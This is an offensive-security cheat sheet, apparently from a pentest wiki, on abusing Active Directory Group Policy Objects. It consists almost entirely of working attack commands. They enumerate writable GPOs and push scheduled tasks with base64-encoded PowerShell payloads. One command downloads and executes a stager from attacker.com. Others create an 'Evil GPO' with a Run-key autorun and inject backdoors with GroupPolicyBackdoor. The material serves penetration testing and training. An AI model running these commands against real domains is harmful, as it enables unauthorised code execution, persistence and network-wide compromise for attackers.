# GPO Abuse
*
*
*
*
*
Force GPO update on all domain computers:
```
PS > Get-ADComputer -Filter * | % {Invoke-GPUpdate -Computer $_.name -Force -RandomDelayInMinutes 0}
```
## Hunt for GPOs
List all GPOs in the domain:
```
PS > .\SharpView.exe Get-DomainGPO -Properties displayName
```
List GPOs applied to a specifiec domain user or computer:
```
PS > .\SharpView.exe Get-DomainGPO -UserIdentity snovvcrash -Properties DisplayName
PS > .\SharpView.exe Get-DomainGPO -ComputerIdentity WS01 -Properties DisplayName
Or
Cmd > gpresult /r /user snovvcrash [/h gpos-snovvcrash.html]
Cmd > gpresult /r /s WS01 [/h gpos-ws01.html]
```
Search for writable GPOs for the `Domain Users` security group:
```
PV3 > Get-DomainGPO | Get-ObjectAcl | ? {$_.SecurityIdentifier -eq ((Get-DomainGroup "Domain Users" | select objectSid).objectSid)}
PV3 > Get-DomainGPO '{}'
Or
PS > Get-GPO -Guid
```
## Permissions Abuse
### Recon
Show all GPOs in the domain:
```
PV3 > Get-NetGPO -Domain megacorp.local | select cn,displayname
```
Search for GPOs that are controlled by the `MEGACORP\PolicyAdmins` group:
```
PV3 > Get-NetGPO | % {Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ? {$_.IdentityReference -eq "MEGACORP\PolicyAdmins"}
```
List computers that are affected by vulnerable (modifiable) GPO:
```
PV3 > Get-NetOU -GUID "00ff00ff-00ff-00ff-00ff-00ff00ff00ff" | % {Get-NetComputer -ADsPath $_}
```
Note: if I list all OUs affected by this GPO with PowerView, there will be no domain shown (like in BloodHound), but in Group Policy Manager we can see that it is presented.
Check if computer settings are enabled for this GPO (and enable them if not):
*
```
PS > Get-Gpo VULN.GPO.NAME
PS > Set-GpoStatus VULN.GPO.NAME -Status AllSettingsEnabled
```
List users that can create a GPO and link it to a specific OU:
```
PV3 > Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=megacorp,DC=local" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -match "CreateChild" } | select objectDN,securityIdentifier | fl
PV3 > Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select objectDN,securityIdentifier | fl
```
### Immediate Scheduled Tasks
#### GPOImmediateTask
* [PowerView3.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/26a0757612e5654b4f792b012ab8f10f95d391c9/Recon/PowerView.ps1#L5907-L6122) [(New-GPOImmediateTask)](https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/)
Create a task with a PowerShell payload:
```
$ echo 'sc -path "c:\\windows\\temp\\poc.txt" -value "GPO Abuse PoC..."' | iconv -t UTF-16LE | base64 -w0; echo
cwBjACAALQBwAGEAdABoACAAIgBjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABlAG0AcABcAHAAbwBjAC4AdAB4AHQAIgAgAC0AdgBhAGwAdQBlACAAIgBHAFAATwAgAEEAYgB1AHMAZQAgAFAAbwBDAC4ALgAuACIACgA=
PS > New-GPOImmediateTask -TaskName Pentest -GPODisplayName VULN.GPO.NAME -CommandArguments '-NoP -NonI -W Hidden -Enc cwBjACAALQBwAGEAdABoACAAIgBjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABlAG0AcABcAHAAbwBjAC4AdAB4AHQAIgAgAC0AdgBhAGwAdQBlACAAIgBHAFAATwAgAEEAYgB1AHMAZQAgAFAAbwBDAC4ALgAuACIACgA=' -Force
```
Clean up:
```
PS > New-GPOImmediateTask -GPODisplayName VULN.GPO.NAME -Remove -Force
```
Check when GP was last applied:
```
Cmd > GPRESULT /R
```
#### GPOwned + pyGPOAbuse
*
*
Get target GPO ID:
```
$ python3 GPOwned.py -u snovvcrash -p 'Passw0rd!' -d megacorp.local -dc-ip 192.168.1.11 -gpcmachine -listgpo
```
Create an immediate scheduled task:
```
$ python3 pygpoabuse.py megacorp.local/snovvcrash:'Passw0rd!' -gpo-id -dc-ip 192.168.1.11 -v -command -powershell '(New-Object Net.WebClient).DownloadFile("https://attacker.com/stager.exe", "C:\Windows\Temp\stager.exe"); if ($?) {C:\Windows\Temp\stager.exe}'
```
### GPPrefRegistryValue
Check if GPMC is installed and if it's not, install it as a Windows Feature (requires elevation):
```
PS > Get-Module -List -Name GroupPolicy | select -expand ExportedCommands
PS > Install-WindowsFeature –Name GPMC
```
Create an evil GPO and link it to the target OU (will be visible in the management console):
```
PS > New-GPO -Name "Evil GPO" | New-GPLink -Target "OU=Workstations,DC=megacorp,DC=local"
```
Locate a writable network share:
```
PV3 > Find-DomainShare -CheckShareAccess
```
Prepare your payload, put it to the network share and create an autorun value in the evil GPO to run the payload on boot/logon:
```
PS > Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "%COMSPEC% /b /c start /b /min /c \\srv01\SoftwareShare\evil.exe" -Type ExpandString
```
## WMI Filters
*
## GPO Abuse via NTLM Relay
*
*
## Tools
*
*
### GroupPolicyBackdoor
*
Install:
```
$ git clone https://github.com/synacktiv/GroupPolicyBackdoor && cd GroupPolicyBackdoor
$ python -m venv venv && source ./venv/bin/activate
$ pip install -r requirements.txt
```
Basic usage:
```
$ python gpb.py gpo enum -d megacorp.local --dc DC01.megacorp.local -k --gpo-name VulnGPO [--ldaps] [-v]
$ python gpb.py gpo inject -d megacorp.local --dc DC01.megacorp.local -k --module modules_templates/ImmediateTask_create.ini --gpo-name VulnGPO [--ldaps] [-v]
$ python gpb.py gpo clean -d megacorp.local --dc DC01.megacorp.local -k --state-folder state_folders/1970_01_01_000000 [--ldaps] [-v]
```